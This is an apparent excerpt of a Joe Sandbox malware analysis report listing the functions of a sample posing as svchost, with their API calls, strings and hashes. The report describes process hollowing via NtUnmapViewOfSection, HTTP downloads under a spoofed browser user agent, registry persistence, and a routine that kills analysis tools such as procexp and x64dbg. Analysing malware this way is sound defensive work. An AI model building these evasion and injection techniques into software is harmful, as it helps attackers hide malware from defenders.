                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                                                  • Opcode ID: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction ID: 8b40593108e929ff889f215dc79f3913a7df659c13445ee8e93910422eb7668c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F0C02590C6C182EB70AB11A8443FEA774FB96704FD04637D9CE46695CF3EF5459620
                                                                                                                                                                                                                                  Function 00007FF7DF2232A4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF2238FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF223948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF223A71), ref: 00007FF7DF22395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22452C: CreateFileW.KERNELBASE ref: 00007FF7DF224573
                                                                                                                                                                                                                                  • CreateThread.KERNELBASE ref: 00007FF7DF22332E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF2210D8: OpenProcess.KERNEL32 ref: 00007FF7DF2210FC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Create$File$AttributesDirectoryFolderOpenPathProcessThread
                                                                                                                                                                                                                                  • String ID: .x64
                                                                                                                                                                                                                                  • API String ID: 60358384-2481150777
                                                                                                                                                                                                                                  • Opcode ID: 7342a6934de48ac5795d7e8bb6a4b03a3ae97d5234cf1b671746ce23dcc77b7f
                                                                                                                                                                                                                                  • Instruction ID: 12d8877db8a305e8f74a8c01d37b4c75e75c925c7a673238227b74007dcad102
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7342a6934de48ac5795d7e8bb6a4b03a3ae97d5234cf1b671746ce23dcc77b7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A701E220A195C282E750FB20FC857EDE2A0AF94744FD08037E44D4B2A6CE3CF649C720
                                                                                                                                                                                                                                  Function 00007FF7DF2214EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 436 7ff7df2214ec-7ff7df221528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction ID: 70e331530e68840b0885277555b2ed32368b5ecd073e693dedc12b9e8fc5f6e6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE0FE76518A8586C620AB15F84415EB7B4FB89794B904126EACD42B28DF3CD6658B04
                                                                                                                                                                                                                                  Function 00007FF7DF221444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 437 7ff7df221444-7ff7df221476 GetSystemInfo 438 7ff7df221478-7ff7df22147d 437->438 439 7ff7df221481-7ff7df221488 437->439 440 7ff7df221493-7ff7df221498 438->440 441 7ff7df22148a-7ff7df22148f 439->441 442 7ff7df221491 439->442 441->440 442->440
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                  • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                                  • Instruction ID: af4d3cfa0906c1942643d0152f4ff0e68ead85ca503f7d41554ea1934132581e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EE06522A1C0C193E7705720ED0577EA2E1F754B48FC00532EA8DC66D8EE2CEA40CB50
                                                                                                                                                                                                                                  Function 00007FF7DF223184 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2604865191-0
                                                                                                                                                                                                                                  • Opcode ID: 3d9f017dcdaff79144b6c04ae862939296fbab255adb15b80c24e59c9c046542
                                                                                                                                                                                                                                  • Instruction ID: 93390701d3ebab13a0a7390e360ef92c44a07e36a55bb8e025ddfebb7d0594a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d9f017dcdaff79144b6c04ae862939296fbab255adb15b80c24e59c9c046542
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9D01220E6C1C2C1F64877B05C850FD91A0AF44340FF04836D249842D0CD1CFAD5C630
                                                                                                                                                                                                                                  Function 00007FF7DF223AEC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction ID: e2e9e24d5b6d3fd31b45dfeb76f59b2e9ffc5b9d6125852686c1f19cf5d678bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08D01221F3898181E794AB26EC997AEA2A0FBC4744FC0C036E6C9415A4CF3CD5D9CF00

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF7DF2224D4 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                  • Opcode ID: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction ID: 89232a6882f2e15737213a75fdd0fd3be72128a631c693750eca231750a1a342
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76c44906d555fc5b1354a9702e756fd3432a91cc5b77d436d86a9f4b2e36bb47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A532D93260CAC586E774DB16E8547EEB7A1FB88B44F804136DA8D83B98DF7DE5448B10
                                                                                                                                                                                                                                  Function 00007FF7DF222168 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7DF2221A5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                                  • Opcode ID: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction ID: 3a257c52ce9272ff6de771361df0e7bdf87b5935655f44d4397e8313d3747e0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f77daa9b4afcd7238f1659cf5dbd7bb3687eb2434c9a3b17e92dc5a8002e488
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9571E836518A8182E750AB54F8947AEF770FBC4794FD05136EA8E43AA8CF7DE444CB10
                                                                                                                                                                                                                                  Function 00007FF7DF223074 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22440C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF2230AF), ref: 00007FF7DF224454
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22440C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF2230AF), ref: 00007FF7DF224491
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22440C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF2230AF), ref: 00007FF7DF22449C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223B4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DF2230B4), ref: 00007FF7DF223B8F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223B4C: RegSetValueExW.ADVAPI32 ref: 00007FF7DF223BC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223B4C: RegCloseKey.ADVAPI32 ref: 00007FF7DF223BD4
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223BEC: RegDeleteKeyW.ADVAPI32 ref: 00007FF7DF223C04
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7DF223DFF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: Process32FirstW.KERNEL32 ref: 00007FF7DF223E32
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: CloseHandle.KERNEL32 ref: 00007FF7DF223E44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: wcscmp.MSVCRT ref: 00007FF7DF223E59
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: OpenProcess.KERNEL32 ref: 00007FF7DF223E6F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: TerminateProcess.KERNEL32 ref: 00007FF7DF223E92
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: CloseHandle.KERNEL32 ref: 00007FF7DF223EA0
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: Process32NextW.KERNEL32 ref: 00007FF7DF223EB3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF223DEC: CloseHandle.KERNEL32 ref: 00007FF7DF223EC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7DF22397C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7DF223AD4), ref: 00007FF7DF2239AC
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7DF22315E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                  • Opcode ID: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction ID: 80e34237346821b6c87c01b06e6249d4ee0272dba0619223511dba1ffdf59244
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A21C521A185C291EA01FBA4EC916FEAB65AF50310FC04573E41D4B1E6DEAEFA85C770
                                                                                                                                                                                                                                  Function 00007FF7DF223DEC Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                                                  • Opcode ID: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction ID: 2f3931e30230675e6419a0a0b5a44349f77f6d50659b0ea31b9dff4dd7e17e5b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79218A71A0C9C681E770AB11EC983EEA261FFC4B54FC44236C69D465A8DF3DE949CB10
                                                                                                                                                                                                                                  Function 00007FF7DF222EA4 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                                                  • Opcode ID: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction ID: cf67e396651d7dc572c3f8973cb5663a7c7c793aaabc7e96ad29026db0843380
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8019A2691CAC2C2E720AB21EC542EDA370FBD8B55FC44537ED8E566A4CF3DF5448620
                                                                                                                                                                                                                                  Function 00007FF7DF223CAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2533958022.00007FF7DF221000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7DF220000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2533819226.00007FF7DF220000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534096895.00007FF7DF225000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534253416.00007FF7DF228000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534376882.00007FF7DF229000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2534574582.00007FF7DF22B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7ff7df220000_svchost.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                  • Opcode ID: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction ID: 831a08eabcc14b76af0d600b335e5d68bf6ac88711d98c2708b44d3737b71c15
